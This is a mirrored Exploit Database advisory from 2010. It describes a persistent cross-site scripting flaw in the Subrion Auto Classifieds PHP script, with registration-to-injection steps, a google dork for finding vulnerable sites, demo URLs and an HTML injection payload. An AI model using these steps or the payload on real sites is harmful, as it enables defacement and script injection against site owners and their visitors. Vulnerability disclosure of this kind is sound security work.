Subrion Auto Classifieds – Persistent Cross-Site Scripting

• Exploit Database
• 17 阅读

• 作者： Sid3^effects
  日期： 2010-07-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14391/

• Name :Subrion Auto Classifieds Persistent Xss Vulnerability
  Date : july 17,2010
  Critical Level 	: HIGH
  vendor URL :http://www.subrion.com/product/autos.html
  google dork:© 2010 Powered by Subrion CMS
  Author : Sid3^effects aKa HaRi 
  special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,SeeMe,RoadKiller 
  greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz 
  #######################################################################################################
  Description:
  Subrion Auto Classifieds is a powerful, highly customizable classifieds script for auto sales sites. It is written in PHP with MySQL. Due to its easy manageable administrator Web interface and its great amount of features it is an excellent choice if you need a cars classifieds portal or an auto auction site.
  #######################################################################################################
  Xploit:Persistent Xss Vulnerability
  
  Step 1 : Register 
  
  Step 2 : Submit your auto. 
  
  DEMO URL :http://autos.site.com/autos/submit.php
  
  Step 3 : The attacker can insert their xss scripts in the options.
  
  Attack Pattern :">><marquee><h1>XSS3d By Sid3^effects</h1><marquee> 
  
  Step 4 : Now check your automobile :) 
  
  DEMO URL :http://autos.site.com/autos/account-autos.html
  
  My demo :http://autos.site.com/autos/Acura/MDX/Acura-MDX-marquee-h1-XSS3d-By-Sid3-effects-h1-marqu-a6.html
  #######################################################################################################
  # 0day no more 
  # Sid3^effects